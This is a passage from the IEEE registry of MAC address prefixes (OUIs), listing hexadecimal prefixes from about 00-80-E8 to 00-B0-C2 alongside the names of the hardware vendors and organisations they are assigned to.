SCIENTIFIC DEV. LTD. 00-80-E8 (hex) CUMULUS CORPORATIION 00-80-E9 (hex) Madge Ltd. 00-80-EA (hex) ADVA Optical Networking Ltd. 00-80-EB (hex) COMPCONTROL B.V. 00-80-EC (hex) SUPERCOMPUTING SOLUTIONS, INC. 00-80-ED (hex) IQ TECHNOLOGIES, INC. 00-80-EE (hex) THOMSON CSF 00-80-EF (hex) RATIONAL 00-80-F0 (hex) Panasonic Communications Co., Ltd. 00-80-F1 (hex) OPUS SYSTEMS 00-80-F2 (hex) RAYCOM SYSTEMS INC 00-80-F3 (hex) SUN ELECTRONICS CORP. 00-80-F4 (hex) TELEMECANIQUE ELECTRIQUE 00-80-F5 (hex) Quantel Ltd 00-80-F6 (hex) SYNERGY MICROSYSTEMS 00-80-F7 (hex) ZENITH ELECTRONICS 00-80-F8 (hex) MIZAR, INC. 00-80-F9 (hex) HEURIKON CORPORATION 00-80-FA (hex) RWT GMBH 00-80-FB (hex) BVM LIMITED 00-80-FC (hex) AVATAR CORPORATION 00-80-FD (hex) EXSCEED CORPRATION 00-80-FE (hex) AZURE TECHNOLOGIES, INC. 00-80-FF (hex) SOC. DE TELEINFORMATIQUE RTC 00-8C-10 (hex) Black Box Corp. 00-8C-FA (hex) Inventec Corporation 00-8D-4E (hex) CJSC NII STT 00-90-00 (hex) DIAMOND MULTIMEDIA 00-90-01 (hex) NISHIMU ELECTRONICS INDUSTRIES CO., LTD. 00-90-02 (hex) ALLGON AB 00-90-03 (hex) APLIO 00-90-04 (hex) 3COM EUROPE LTD. 00-90-05 (hex) PROTECH SYSTEMS CO., LTD. 00-90-06 (hex) HAMAMATSU PHOTONICS K.K. 00-90-07 (hex) DOMEX TECHNOLOGY CORP. 00-90-08 (hex) HanA Systems Inc. 00-90-09 (hex) i Controls, Inc. 00-90-0A (hex) PROTON ELECTRONIC INDUSTRIAL CO., LTD. 00-90-0B (hex) LANNER ELECTRONICS, INC. 00-90-0C (hex) CISCO SYSTEMS, INC. 00-90-0D (hex) Overland Storage Inc. 00-90-0E (hex) HANDLINK TECHNOLOGIES, INC. 00-90-0F (hex) KAWASAKI HEAVY INDUSTRIES, LTD 00-90-10 (hex) SIMULATION LABORATORIES, INC. 00-90-11 (hex) WAVTrace, Inc. 00-90-12 (hex) GLOBESPAN SEMICONDUCTOR, INC. 00-90-13 (hex) SAMSAN CORP. 00-90-14 (hex) ROTORK INSTRUMENTS, LTD. 00-90-15 (hex) CENTIGRAM COMMUNICATIONS CORP. 00-90-16 (hex) ZAC 00-90-17 (hex) Zypcom, Inc 00-90-18 (hex) ITO ELECTRIC INDUSTRY CO, LTD. 00-90-19 (hex) HERMES ELECTRONICS CO., LTD. 00-90-1A (hex) UNISPHERE SOLUTIONS 00-90-1B (hex) DIGITAL CONTROLS 00-90-1C (hex) mps Software Gmbh 00-90-1D (hex) PEC (NZ) LTD. 00-90-1E (hex) Selesta Ingegneria S.p.A. 00-90-1F (hex) ADTEC PRODUCTIONS, INC. 00-90-20 (hex) PHILIPS ANALYTICAL X-RAY B.V. 00-90-21 (hex) CISCO SYSTEMS, INC. 00-90-22 (hex) IVEX 00-90-23 (hex) ZILOG INC. 00-90-24 (hex) PIPELINKS, INC. 00-90-25 (hex) BAE Systems Australia (Electronic Systems) Pty Ltd 00-90-26 (hex) ADVANCED SWITCHING COMMUNICATIONS, INC. 00-90-27 (hex) INTEL CORPORATION 00-90-28 (hex) NIPPON SIGNAL CO., LTD. 00-90-29 (hex) CRYPTO AG 00-90-2A (hex) COMMUNICATION DEVICES, INC. 00-90-2B (hex) CISCO SYSTEMS, INC. 00-90-2C (hex) DATA & CONTROL EQUIPMENT LTD. 00-90-2D (hex) DATA ELECTRONICS (AUST.) PTY, LTD. 00-90-2E (hex) NAMCO LIMITED 00-90-2F (hex) NETCORE SYSTEMS, INC. 00-90-30 (hex) HONEYWELL-DATING 00-90-31 (hex) MYSTICOM, LTD. 00-90-32 (hex) PELCOMBE GROUP LTD. 00-90-33 (hex) INNOVAPHONE AG 00-90-34 (hex) IMAGIC, INC. 00-90-35 (hex) ALPHA TELECOM, INC. 00-90-36 (hex) ens, inc. 00-90-37 (hex) ACUCOMM, INC. 00-90-38 (hex) FOUNTAIN TECHNOLOGIES, INC. 00-90-39 (hex) SHASTA NETWORKS 00-90-3A (hex) NIHON MEDIA TOOL INC. 00-90-3B (hex) TriEMS Research Lab, Inc. 00-90-3C (hex) ATLANTIC NETWORK SYSTEMS 00-90-3D (hex) BIOPAC SYSTEMS, INC. 00-90-3E (hex) N.V. PHILIPS INDUSTRIAL ACTIVITIES 00-90-3F (hex) AZTEC RADIOMEDIA 00-90-40 (hex) Siemens Network Convergence LLC 00-90-41 (hex) APPLIED DIGITAL ACCESS 00-90-42 (hex) ECCS, Inc. 00-90-43 (hex) NICHIBEI DENSHI CO., LTD. 00-90-44 (hex) ASSURED DIGITAL, INC. 00-90-45 (hex) Marconi Communications 00-90-46 (hex) DEXDYNE, LTD. 00-90-47 (hex) GIGA FAST E. LTD. 00-90-48 (hex) ZEAL CORPORATION 00-90-49 (hex) ENTRIDIA CORPORATION 00-90-4A (hex) CONCUR SYSTEM TECHNOLOGIES 00-90-4B (hex) GemTek Technology Co., Ltd. 00-90-4C (hex) EPIGRAM, INC. 00-90-4D (hex) SPEC S.A. 00-90-4E (hex) DELEM BV 00-90-4F (hex) ABB POWER T&D COMPANY, INC. 00-90-50 (hex) TELESTE OY 00-90-51 (hex) ULTIMATE TECHNOLOGY CORP. 00-90-52 (hex) SELCOM ELETTRONICA S.R.L. 00-90-53 (hex) DAEWOO ELECTRONICS CO., LTD. 00-90-54 (hex) INNOVATIVE SEMICONDUCTORS, INC 00-90-55 (hex) PARKER HANNIFIN CORPORATION COMPUMOTOR DIVISION 00-90-56 (hex) TELESTREAM, INC. 00-90-57 (hex) AANetcom, Inc. 00-90-58 (hex) Ultra Electronics Ltd., Command and Control Systems 00-90-59 (hex) TELECOM DEVICE K.K. 00-90-5A (hex) DEARBORN GROUP, INC. 00-90-5B (hex) RAYMOND AND LAE ENGINEERING 00-90-5C (hex) EDMI 00-90-5D (hex) NETCOM SICHERHEITSTECHNIK GmbH 00-90-5E (hex) RAULAND-BORG CORPORATION 00-90-5F (hex) CISCO SYSTEMS, INC. 00-90-60 (hex) SYSTEM CREATE CORP. 00-90-61 (hex) PACIFIC RESEARCH & ENGINEERING CORPORATION 00-90-62 (hex) ICP VORTEX COMPUTERSYSTEME GmbH 00-90-63 (hex) COHERENT COMMUNICATIONS SYSTEMS CORPORATION 00-90-64 (hex) Thomson Inc. 00-90-65 (hex) FINISAR CORPORATION 00-90-66 (hex) Troika Networks, Inc. 00-90-67 (hex) WalkAbout Computers, Inc. 00-90-68 (hex) DVT CORP. 00-90-69 (hex) JUNIPER NETWORKS, INC. 00-90-6A (hex) TURNSTONE SYSTEMS, INC. 00-90-6B (hex) APPLIED RESOURCES, INC. 00-90-6C (hex) Sartorius Hamburg GmbH 00-90-6D (hex) CISCO SYSTEMS, INC. 00-90-6E (hex) PRAXON, INC. 00-90-6F (hex) CISCO SYSTEMS, INC. 00-90-70 (hex) NEO NETWORKS, INC. 00-90-71 (hex) Applied Innovation Inc. 00-90-72 (hex) SIMRAD AS 00-90-73 (hex) GAIO TECHNOLOGY 00-90-74 (hex) ARGON NETWORKS, INC. 00-90-75 (hex) NEC DO BRASIL S.A. 00-90-76 (hex) FMT AIRCRAFT GATE SUPPORT SYSTEMS AB 00-90-77 (hex) ADVANCED FIBRE COMMUNICATIONS 00-90-78 (hex) MER TELEMANAGEMENT SOLUTIONS, LTD. 00-90-79 (hex) ClearOne, Inc. 00-90-7A (hex) Polycom, Inc. 00-90-7B (hex) E-TECH, INC. 00-90-7C (hex) DIGITALCAST, INC. 00-90-7D (hex) Lake Communications 00-90-7E (hex) VETRONIX CORP. 00-90-7F (hex) WatchGuard Technologies, Inc. 00-90-80 (hex) NOT LIMITED, INC. 00-90-81 (hex) ALOHA NETWORKS, INC. 00-90-82 (hex) FORCE INSTITUTE 00-90-83 (hex) TURBO COMMUNICATION, INC. 00-90-84 (hex) ATECH SYSTEM 00-90-85 (hex) GOLDEN ENTERPRISES, INC. 00-90-86 (hex) CISCO SYSTEMS, INC. 00-90-87 (hex) ITIS 00-90-88 (hex) BAXALL SECURITY LTD. 00-90-89 (hex) SOFTCOM MICROSYSTEMS, INC. 00-90-8A (hex) BAYLY COMMUNICATIONS, INC. 00-90-8B (hex) PFU Systems, Inc. 00-90-8C (hex) ETREND ELECTRONICS, INC. 00-90-8D (hex) VICKERS ELECTRONICS SYSTEMS 00-90-8E (hex) Nortel Networks Broadband Access 00-90-8F (hex) AUDIO CODES LTD. 00-90-90 (hex) I-BUS 00-90-91 (hex) DigitalScape, Inc. 00-90-92 (hex) CISCO SYSTEMS, INC. 00-90-93 (hex) NANAO CORPORATION 00-90-94 (hex) OSPREY TECHNOLOGIES, INC. 00-90-95 (hex) UNIVERSAL AVIONICS 00-90-96 (hex) ASKEY COMPUTER CORP. 00-90-97 (hex) Sycamore Networks 00-90-98 (hex) SBC DESIGNS, INC. 00-90-99 (hex) ALLIED TELESIS, K.K. 00-90-9A (hex) ONE WORLD SYSTEMS, INC. 00-90-9B (hex) IMAJE 00-90-9C (hex) Motorola, Inc. 00-90-9D (hex) NovaTech Process Solutions, LLC 00-90-9E (hex) Critical IO, LLC 00-90-9F (hex) DIGI-DATA CORPORATION 00-90-A0 (hex) 8X8 INC. 00-90-A1 (hex) Flying Pig Systems/High End Systems Inc. 00-90-A2 (hex) CYBERTAN TECHNOLOGY, INC. 00-90-A3 (hex) Corecess Inc. 00-90-A4 (hex) ALTIGA NETWORKS 00-90-A5 (hex) SPECTRA LOGIC 00-90-A6 (hex) CISCO SYSTEMS, INC. 00-90-A7 (hex) CLIENTEC CORPORATION 00-90-A8 (hex) NineTiles Networks, Ltd. 00-90-A9 (hex) WESTERN DIGITAL 00-90-AA (hex) INDIGO ACTIVE VISION SYSTEMS LIMITED 00-90-AB (hex) CISCO SYSTEMS, INC. 00-90-AC (hex) OPTIVISION, INC. 00-90-AD (hex) ASPECT ELECTRONICS, INC. 00-90-AE (hex) ITALTEL S.p.A. 00-90-AF (hex) J. MORITA MFG. CORP. 00-90-B0 (hex) VADEM 00-90-B1 (hex) CISCO SYSTEMS, INC. 00-90-B2 (hex) AVICI SYSTEMS INC. 00-90-B3 (hex) AGRANAT SYSTEMS 00-90-B4 (hex) WILLOWBROOK TECHNOLOGIES 00-90-B5 (hex) NIKON CORPORATION 00-90-B6 (hex) FIBEX SYSTEMS 00-90-B7 (hex) DIGITAL LIGHTWAVE, INC. 00-90-B8 (hex) ROHDE & SCHWARZ GMBH & CO. KG 00-90-B9 (hex) BERAN INSTRUMENTS LTD. 00-90-BA (hex) VALID NETWORKS, INC. 00-90-BB (hex) TAINET COMMUNICATION SYSTEM Corp. 00-90-BC (hex) TELEMANN CO., LTD. 00-90-BD (hex) OMNIA COMMUNICATIONS, INC. 00-90-BE (hex) IBC/INTEGRATED BUSINESS COMPUTERS 00-90-BF (hex) CISCO SYSTEMS, INC. 00-90-C0 (hex) K.J. LAW ENGINEERS, INC. 00-90-C1 (hex) Peco II, Inc. 00-90-C2 (hex) JK microsystems, Inc. 00-90-C3 (hex) TOPIC SEMICONDUCTOR CORP. 00-90-C4 (hex) JAVELIN SYSTEMS, INC. 00-90-C5 (hex) INTERNET MAGIC, INC. 00-90-C6 (hex) OPTIM SYSTEMS, INC. 00-90-C7 (hex) ICOM INC. 00-90-C8 (hex) WAVERIDER COMMUNICATIONS (CANADA) INC. 00-90-C9 (hex) DPAC Technologies 00-90-CA (hex) ACCORD VIDEO TELECOMMUNICATIONS, LTD. 00-90-CB (hex) Wireless OnLine, Inc. 00-90-CC (hex) Planex Communications 00-90-CD (hex) ENT-EMPRESA NACIONAL DE TELECOMMUNICACOES, S.A. 00-90-CE (hex) TETRA GmbH 00-90-CF (hex) NORTEL 00-90-D0 (hex) Thomson Telecom Belgium 00-90-D1 (hex) LEICHU ENTERPRISE CO., LTD. 00-90-D2 (hex) ARTEL VIDEO SYSTEMS 00-90-D3 (hex) GIESECKE & DEVRIENT GmbH 00-90-D4 (hex) BindView Development Corp. 00-90-D5 (hex) EUPHONIX, INC. 00-90-D6 (hex) CRYSTAL GROUP 00-90-D7 (hex) NetBoost Corp. 00-90-D8 (hex) WHITECROSS SYSTEMS 00-90-D9 (hex) CISCO SYSTEMS, INC. 00-90-DA (hex) DYNARC, INC. 00-90-DB (hex) NEXT LEVEL COMMUNICATIONS 00-90-DC (hex) TECO INFORMATION SYSTEMS 00-90-DD (hex) THE MIHARU COMMUNICATIONS CO., LTD. 00-90-DE (hex) CARDKEY SYSTEMS, INC. 00-90-DF (hex) MITSUBISHI CHEMICAL AMERICA, INC. 00-90-E0 (hex) SYSTRAN CORP. 00-90-E1 (hex) TELENA S.P.A. 00-90-E2 (hex) DISTRIBUTED PROCESSING TECHNOLOGY 00-90-E3 (hex) AVEX ELECTRONICS INC. 00-90-E4 (hex) NEC AMERICA, INC. 00-90-E5 (hex) TEKNEMA, INC. 00-90-E6 (hex) ALi Corporation 00-90-E7 (hex) HORSCH ELEKTRONIK AG 00-90-E8 (hex) MOXA TECHNOLOGIES CORP., LTD. 00-90-E9 (hex) JANZ COMPUTER AG 00-90-EA (hex) ALPHA TECHNOLOGIES, INC. 00-90-EB (hex) SENTRY TELECOM SYSTEMS 00-90-EC (hex) PYRESCOM 00-90-ED (hex) CENTRAL SYSTEM RESEARCH CO., LTD. 00-90-EE (hex) PERSONAL COMMUNICATIONS TECHNOLOGIES 00-90-EF (hex) INTEGRIX, INC. 00-90-F0 (hex) Harmonic Video Systems Ltd. 00-90-F1 (hex) DOT HILL SYSTEMS CORPORATION 00-90-F2 (hex) CISCO SYSTEMS, INC. 00-90-F3 (hex) ASPECT COMMUNICATIONS 00-90-F4 (hex) LIGHTNING INSTRUMENTATION 00-90-F5 (hex) CLEVO CO. 00-90-F6 (hex) ESCALATE NETWORKS, INC. 00-90-F7 (hex) NBASE COMMUNICATIONS LTD. 00-90-F8 (hex) MEDIATRIX TELECOM 00-90-F9 (hex) LEITCH 00-90-FA (hex) EMULEX Corp 00-90-FB (hex) PORTWELL, INC. 00-90-FC (hex) NETWORK COMPUTING DEVICES 00-90-FD (hex) CopperCom, Inc. 00-90-FE (hex) ELECOM CO., LTD. (LANEED DIV.) 00-90-FF (hex) TELLUS TECHNOLOGY INC. 00-91-D6 (hex) Crystal Group, Inc. 00-91-FA (hex) Synapse Product Development 00-93-63 (hex) Uni-Link Technology Co., Ltd. 00-97-FF (hex) Heimann Sensor GmbH 00-9C-02 (hex) Hewlett-Packard Company 00-9D-8E (hex) CARDIAC RECORDERS, INC. 00-A0-00 (hex) CENTILLION NETWORKS, INC. 00-A0-01 (hex) DRS Signal Solutions 00-A0-02 (hex) LEEDS & NORTHRUP AUSTRALIA PTY LTD 00-A0-03 (hex) Siemens Switzerland Ltd., I B T HVP 00-A0-04 (hex) NETPOWER, INC. 00-A0-05 (hex) DANIEL INSTRUMENTS, LTD. 00-A0-06 (hex) IMAGE DATA PROCESSING SYSTEM GROUP 00-A0-07 (hex) APEXX TECHNOLOGY, INC. 00-A0-08 (hex) NETCORP 00-A0-09 (hex) WHITETREE NETWORK 00-A0-0A (hex) Airspan 00-A0-0B (hex) COMPUTEX CO., LTD. 00-A0-0C (hex) KINGMAX TECHNOLOGY, INC. 00-A0-0D (hex) THE PANDA PROJECT 00-A0-0E (hex) VISUAL NETWORKS, INC. 00-A0-0F (hex) Broadband Technologies 00-A0-10 (hex) SYSLOGIC DATENTECHNIK AG 00-A0-11 (hex) MUTOH INDUSTRIES LTD. 00-A0-12 (hex) Telco Systems, Inc. 00-A0-13 (hex) TELTREND LTD. 00-A0-14 (hex) CSIR 00-A0-15 (hex) WYLE 00-A0-16 (hex) MICROPOLIS CORP. 00-A0-17 (hex) J B M CORPORATION 00-A0-18 (hex) CREATIVE CONTROLLERS, INC. 00-A0-19 (hex) NEBULA CONSULTANTS, INC. 00-A0-1A (hex) BINAR ELEKTRONIK AB 00-A0-1B (hex) PREMISYS COMMUNICATIONS, INC. 00-A0-1C (hex) NASCENT NETWORKS CORPORATION 00-A0-1D (hex) SIXNET 00-A0-1E (hex) EST CORPORATION 00-A0-1F (hex) TRICORD SYSTEMS, INC. 00-A0-20 (hex) CITICORP/TTI 00-A0-21 (hex) General Dynamics 00-A0-22 (hex) CENTRE FOR DEVELOPMENT OF ADVANCED COMPUTING 00-A0-23 (hex) APPLIED CREATIVE TECHNOLOGY, INC. 00-A0-24 (hex) 3COM CORPORATION 00-A0-25 (hex) REDCOM LABS INC. 00-A0-26 (hex) TELDAT, S.A. 00-A0-27 (hex) FIREPOWER SYSTEMS, INC. 00-A0-28 (hex) CONNER PERIPHERALS 00-A0-29 (hex) COULTER CORPORATION 00-A0-2A (hex) TRANCELL SYSTEMS 00-A0-2B (hex) TRANSITIONS RESEARCH CORP. 00-A0-2C (hex) interWAVE Communications 00-A0-2D (hex) 1394 Trade Association 00-A0-2E (hex) BRAND COMMUNICATIONS, LTD. 00-A0-2F (hex) PIRELLI CAVI 00-A0-30 (hex) CAPTOR NV/SA 00-A0-31 (hex) HAZELTINE CORPORATION, MS 1-17 00-A0-32 (hex) GES SINGAPORE PTE. LTD. 00-A0-33 (hex) imc MeBsysteme GmbH 00-A0-34 (hex) AXEL 00-A0-35 (hex) CYLINK CORPORATION 00-A0-36 (hex) APPLIED NETWORK TECHNOLOGY 00-A0-37 (hex) Mindray DS USA, Inc. 00-A0-38 (hex) EMAIL ELECTRONICS 00-A0-39 (hex) ROSS TECHNOLOGY, INC. 00-A0-3A (hex) KUBOTEK CORPORATION 00-A0-3B (hex) TOSHIN ELECTRIC CO., LTD. 00-A0-3C (hex) EG&G NUCLEAR INSTRUMENTS 00-A0-3D (hex) OPTO-22 00-A0-3E (hex) ATM FORUM 00-A0-3F (hex) COMPUTER SOCIETY MICROPROCESSOR & MICROPROCESSOR STANDARDS C 00-A0-40 (hex) APPLE COMPUTER 00-A0-41 (hex) INFICON 00-A0-42 (hex) SPUR PRODUCTS CORP. 00-A0-43 (hex) AMERICAN TECHNOLOGY LABS, INC. 00-A0-44 (hex) NTT IT CO., LTD. 00-A0-45 (hex) PHOENIX CONTACT GMBH & CO. 00-A0-46 (hex) SCITEX CORP. LTD. 00-A0-47 (hex) INTEGRATED FITNESS CORP. 00-A0-48 (hex) QUESTECH, LTD. 00-A0-49 (hex) DIGITECH INDUSTRIES, INC. 00-A0-4A (hex) NISSHIN ELECTRIC CO., LTD. 00-A0-4B (hex) TFL LAN INC. 00-A0-4C (hex) INNOVATIVE SYSTEMS & TECHNOLOGIES, INC. 00-A0-4D (hex) EDA INSTRUMENTS, INC. 00-A0-4E (hex) VOELKER TECHNOLOGIES, INC. 00-A0-4F (hex) AMERITEC CORP. 00-A0-50 (hex) CYPRESS SEMICONDUCTOR 00-A0-51 (hex) ANGIA COMMUNICATIONS. INC. 00-A0-52 (hex) STANILITE ELECTRONICS PTY. LTD 00-A0-53 (hex) COMPACT DEVICES, INC. 00-A0-54 (hex) PRIVATE 00-A0-55 (hex) Data Device Corporation 00-A0-56 (hex) MICROPROSS 00-A0-57 (hex) LANCOM Systems GmbH 00-A0-58 (hex) GLORY, LTD. 00-A0-59 (hex) HAMILTON HALLMARK 00-A0-5A (hex) KOFAX IMAGE PRODUCTS 00-A0-5B (hex) MARQUIP, INC. 00-A0-5C (hex) INVENTORY CONVERSION, INC./ 00-A0-5D (hex) CS COMPUTER SYSTEME GmbH 00-A0-5E (hex) MYRIAD LOGIC INC. 00-A0-5F (hex) BTG Electronics Design BV 00-A0-60 (hex) ACER PERIPHERALS, INC. 00-A0-61 (hex) PURITAN BENNETT 00-A0-62 (hex) AES PRODATA 00-A0-63 (hex) JRL SYSTEMS, INC. 00-A0-64 (hex) KVB/ANALECT 00-A0-65 (hex) Symantec Corporation 00-A0-66 (hex) ISA CO., LTD. 00-A0-67 (hex) NETWORK SERVICES GROUP 00-A0-68 (hex) BHP LIMITED 00-A0-69 (hex) Symmetricom, Inc. 00-A0-6A (hex) Verilink Corporation 00-A0-6B (hex) DMS DORSCH MIKROSYSTEM GMBH 00-A0-6C (hex) SHINDENGEN ELECTRIC MFG. CO., LTD. 00-A0-6D (hex) MANNESMANN TALLY CORPORATION 00-A0-6E (hex) AUSTRON, INC. 00-A0-6F (hex) THE APPCON GROUP, INC. 00-A0-70 (hex) COASTCOM 00-A0-71 (hex) VIDEO LOTTERY TECHNOLOGIES,INC 00-A0-72 (hex) OVATION SYSTEMS LTD. 00-A0-73 (hex) COM21, INC. 00-A0-74 (hex) PERCEPTION TECHNOLOGY 00-A0-75 (hex) MICRON TECHNOLOGY, INC. 00-A0-76 (hex) CARDWARE LAB, INC. 00-A0-77 (hex) FUJITSU NEXION, INC. 00-A0-78 (hex) Marconi Communications 00-A0-79 (hex) ALPS ELECTRIC (USA), INC. 00-A0-7A (hex) ADVANCED PERIPHERALS TECHNOLOGIES, INC. 00-A0-7B (hex) DAWN COMPUTER INCORPORATION 00-A0-7C (hex) TONYANG NYLON CO., LTD. 00-A0-7D (hex) SEEQ TECHNOLOGY, INC. 00-A0-7E (hex) AVID TECHNOLOGY, INC. 00-A0-7F (hex) GSM-SYNTEL, LTD. 00-A0-80 (hex) SBE, Inc. 00-A0-81 (hex) ALCATEL DATA NETWORKS 00-A0-82 (hex) NKT ELEKTRONIK A/S 00-A0-83 (hex) ASIMMPHONY TURKEY 00-A0-84 (hex) Dataplex Pty Ltd 00-A0-85 (hex) PRIVATE 00-A0-86 (hex) AMBER WAVE SYSTEMS, INC. 00-A0-87 (hex) Zarlink Semiconductor Ltd. 00-A0-88 (hex) ESSENTIAL COMMUNICATIONS 00-A0-89 (hex) XPOINT TECHNOLOGIES, INC. 00-A0-8A (hex) BROOKTROUT TECHNOLOGY, INC. 00-A0-8B (hex) ASTON ELECTRONIC DESIGNS LTD. 00-A0-8C (hex) MultiMedia LANs, Inc. 00-A0-8D (hex) JACOMO CORPORATION 00-A0-8E (hex) Check Point Software Technologies 00-A0-8F (hex) DESKNET SYSTEMS, INC. 00-A0-90 (hex) TimeStep Corporation 00-A0-91 (hex) APPLICOM INTERNATIONAL 00-A0-92 (hex) H. BOLLMANN MANUFACTURERS, LTD 00-A0-93 (hex) B/E AEROSPACE, Inc. 00-A0-94 (hex) COMSAT CORPORATION 00-A0-95 (hex) ACACIA NETWORKS, INC. 00-A0-96 (hex) MITUMI ELECTRIC CO., LTD. 00-A0-97 (hex) JC INFORMATION SYSTEMS 00-A0-98 (hex) NetApp 00-A0-99 (hex) K-NET LTD. 00-A0-9A (hex) NIHON KOHDEN AMERICA 00-A0-9B (hex) QPSX COMMUNICATIONS, LTD. 00-A0-9C (hex) Xyplex, Inc. 00-A0-9D (hex) JOHNATHON FREEMAN TECHNOLOGIES 00-A0-9E (hex) ICTV 00-A0-9F (hex) COMMVISION CORP. 00-A0-A0 (hex) COMPACT DATA, LTD. 00-A0-A1 (hex) EPIC DATA INC. 00-A0-A2 (hex) DIGICOM S.P.A. 00-A0-A3 (hex) RELIABLE POWER METERS 00-A0-A4 (hex) MICROS SYSTEMS, INC. 00-A0-A5 (hex) TEKNOR MICROSYSTEME, INC. 00-A0-A6 (hex) M.I. SYSTEMS, K.K. 00-A0-A7 (hex) VORAX CORPORATION 00-A0-A8 (hex) RENEX CORPORATION 00-A0-A9 (hex) NAVTEL COMMUNICATIONS INC. 00-A0-AA (hex) SPACELABS MEDICAL 00-A0-AB (hex) NETCS INFORMATIONSTECHNIK GMBH 00-A0-AC (hex) GILAT SATELLITE NETWORKS, LTD. 00-A0-AD (hex) MARCONI SPA 00-A0-AE (hex) NUCOM SYSTEMS, INC. 00-A0-AF (hex) WMS INDUSTRIES 00-A0-B0 (hex) I-O DATA DEVICE, INC. 00-A0-B1 (hex) FIRST VIRTUAL CORPORATION 00-A0-B2 (hex) SHIMA SEIKI 00-A0-B3 (hex) ZYKRONIX 00-A0-B4 (hex) TEXAS MICROSYSTEMS, INC. 00-A0-B5 (hex) 3H TECHNOLOGY 00-A0-B6 (hex) SANRITZ AUTOMATION CO., LTD. 00-A0-B7 (hex) CORDANT, INC. 00-A0-B8 (hex) SYMBIOS LOGIC INC. 00-A0-B9 (hex) EAGLE TECHNOLOGY, INC. 00-A0-BA (hex) PATTON ELECTRONICS CO. 00-A0-BB (hex) HILAN GMBH 00-A0-BC (hex) VIASAT, INCORPORATED 00-A0-BD (hex) I-TECH CORP. 00-A0-BE (hex) INTEGRATED CIRCUIT SYSTEMS, INC. COMMUNICATIONS GROUP 00-A0-BF (hex) WIRELESS DATA GROUP MOTOROLA 00-A0-C0 (hex) DIGITAL LINK CORP. 00-A0-C1 (hex) ORTIVUS MEDICAL AB 00-A0-C2 (hex) R.A. SYSTEMS CO., LTD. 00-A0-C3 (hex) UNICOMPUTER GMBH 00-A0-C4 (hex) CRISTIE ELECTRONICS LTD. 00-A0-C5 (hex) ZYXEL COMMUNICATION 00-A0-C6 (hex) QUALCOMM INCORPORATED 00-A0-C7 (hex) TADIRAN TELECOMMUNICATIONS 00-A0-C8 (hex) ADTRAN INC. 00-A0-C9 (hex) INTEL CORPORATION - HF1-06 00-A0-CA (hex) FUJITSU DENSO LTD. 00-A0-CB (hex) ARK TELECOMMUNICATIONS, INC. 00-A0-CC (hex) LITE-ON COMMUNICATIONS, INC. 00-A0-CD (hex) DR. JOHANNES HEIDENHAIN GmbH 00-A0-CE (hex) Ecessa 00-A0-CF (hex) SOTAS, INC. 00-A0-D0 (hex) TEN X TECHNOLOGY, INC. 00-A0-D1 (hex) INVENTEC CORPORATION 00-A0-D2 (hex) ALLIED TELESIS INTERNATIONAL CORPORATION 00-A0-D3 (hex) INSTEM COMPUTER SYSTEMS, LTD. 00-A0-D4 (hex) RADIOLAN, INC. 00-A0-D5 (hex) SIERRA WIRELESS INC. 00-A0-D6 (hex) SBE, INC. 00-A0-D7 (hex) KASTEN CHASE APPLIED RESEARCH 00-A0-D8 (hex) SPECTRA - TEK 00-A0-D9 (hex) CONVEX COMPUTER CORPORATION 00-A0-DA (hex) INTEGRATED SYSTEMS Technology, Inc. 00-A0-DB (hex) FISHER & PAYKEL PRODUCTION 00-A0-DC (hex) O.N. ELECTRONIC CO., LTD. 00-A0-DD (hex) AZONIX CORPORATION 00-A0-DE (hex) YAMAHA CORPORATION 00-A0-DF (hex) STS TECHNOLOGIES, INC. 00-A0-E0 (hex) TENNYSON TECHNOLOGIES PTY LTD 00-A0-E1 (hex) WESTPORT RESEARCH ASSOCIATES, INC. 00-A0-E2 (hex) Keisokugiken Corporation 00-A0-E3 (hex) XKL SYSTEMS CORP. 00-A0-E4 (hex) OPTIQUEST 00-A0-E5 (hex) NHC COMMUNICATIONS 00-A0-E6 (hex) DIALOGIC CORPORATION 00-A0-E7 (hex) CENTRAL DATA CORPORATION 00-A0-E8 (hex) REUTERS HOLDINGS PLC 00-A0-E9 (hex) ELECTRONIC RETAILING SYSTEMS INTERNATIONAL 00-A0-EA (hex) ETHERCOM CORP. 00-A0-EB (hex) Encore Networks, Inc. 00-A0-EC (hex) TRANSMITTON LTD. 00-A0-ED (hex) Brooks Automation, Inc. 00-A0-EE (hex) NASHOBA NETWORKS 00-A0-EF (hex) LUCIDATA LTD. 00-A0-F0 (hex) TORONTO MICROELECTRONICS INC. 00-A0-F1 (hex) MTI 00-A0-F2 (hex) INFOTEK COMMUNICATIONS, INC. 00-A0-F3 (hex) STAUBLI 00-A0-F4 (hex) GE 00-A0-F5 (hex) RADGUARD LTD. 00-A0-F6 (hex) AutoGas Systems Inc. 00-A0-F7 (hex) V.I COMPUTER CORP. 00-A0-F8 (hex) SYMBOL TECHNOLOGIES, INC. 00-A0-F9 (hex) BINTEC COMMUNICATIONS GMBH 00-A0-FA (hex) Marconi Communication GmbH 00-A0-FB (hex) TORAY ENGINEERING CO., LTD. 00-A0-FC (hex) IMAGE SCIENCES, INC. 00-A0-FD (hex) SCITEX DIGITAL PRINTING, INC. 00-A0-FE (hex) BOSTON TECHNOLOGY, INC. 00-A0-FF (hex) TELLABS OPERATIONS, INC. 00-A1-DE (hex) ShenZhen ShiHua Technology CO.,LTD 00-A2-DA (hex) INAT GmbH 00-AA-00 (hex) INTEL CORPORATION 00-AA-01 (hex) INTEL CORPORATION 00-AA-02 (hex) INTEL CORPORATION 00-AA-3C (hex) OLIVETTI TELECOM SPA (OLTECO) 00-B0-09 (hex) Grass Valley Group 00-B0-17 (hex) InfoGear Technology Corp. 00-B0-19 (hex) Casi-Rusco 00-B0-1C (hex) Westport Technologies 00-B0-1E (hex) Rantic Labs, Inc. 00-B0-2A (hex) ORSYS GmbH 00-B0-2D (hex) ViaGate Technologies, Inc. 00-B0-33 (hex) OAO "Izhevskiy radiozavod" 00-B0-3B (hex) HiQ Networks 00-B0-48 (hex) Marconi Communications Inc. 00-B0-4A (hex) Cisco Systems, Inc. 00-B0-52 (hex) Atheros Communications 00-B0-64 (hex) Cisco Systems, Inc. 00-B0-69 (hex) Honewell Oy 00-B0-6D (hex) Jones Futurex Inc. 00-B0-80 (hex) Mannesmann Ipulsys B.V. 00-B0-86 (hex) LocSoft Limited 00-B0-8E (hex) Cisco Systems, Inc. 00-B0-91 (hex) Transmeta Corp. 00-B0-94 (hex) Alaris, Inc. 00-B0-9A (hex) Morrow Technologies Corp. 00-B0-9D (hex) Point Grey Research Inc. 00-B0-AC (hex) SIAE-Microelettronica S.p.A. 00-B0-AE (hex) Symmetricom 00-B0-B3 (hex) Xstreamis PLC 00-B0-C2 (hex) Cisco Systems, Inc. 